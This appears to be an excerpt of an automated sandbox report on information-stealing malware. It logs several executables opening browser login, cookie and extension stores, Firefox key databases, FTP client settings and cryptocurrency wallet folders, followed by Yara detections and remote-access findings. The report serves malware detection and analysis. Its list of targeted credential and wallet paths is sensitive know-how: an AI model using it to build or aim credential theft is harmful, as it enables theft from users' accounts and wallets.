                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqlite
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfo
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Roaming\FTPbox
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Roaming\FTPRush
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetter
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTP
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                          Source: C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                          Source: C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
                          Source: C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                          Source: C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                          Source: C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                          Source: C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                          Source: C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exeFile opened: C:\Users\user\AppData\Roaming\Binance
                          Source: C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                          Source: C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                          Source: C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                          Source: C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Roaming\Binance
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQBJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQBJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQBJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQBJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exeDirectory queried: C:\Users\user\Documents
                          Source: C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exeDirectory queried: C:\Users\user\Documents
                          Source: C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEY
                          Source: C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEY
                          Source: C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exeDirectory queried: C:\Users\user\Documents
                          Source: C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exeDirectory queried: C:\Users\user\Documents
                          Source: C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZ
                          Source: C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZ
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAU
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAU
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeDirectory queried: C:\Users\user\Documents
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeDirectory queried: C:\Users\user\Documents
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZ
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZ
                          Source: Yara matchFile source: 0000000C.00000003.1981626588.0000000001384000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000023.00000003.2241106729.0000000000B4F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000011.00000003.2019127027.000000000105D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000023.00000003.2268488347.0000000000B4D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: s7MG2VL.exe PID: 8140, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: ZqkKpwG.exe PID: 6364, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: eAzoDbY.exe PID: 4224, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: yo7qmvz.exe PID: 2828, type: MEMORYSTR

                          Remote Access Functionality

                          barindex
                          Source: Yara matchFile source: 28.2.8sb9w_003.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 31.2.svchost.exe.1dbe2750000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 28.2.8sb9w_003.exe.83afc8.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0000001C.00000002.2039011701.0000000000434000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001F.00000002.2469971107.000001DBE2788000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001C.00000002.2039794527.0000000000836000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: 8sb9w_003.exe PID: 4840, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 4260, type: MEMORYSTR
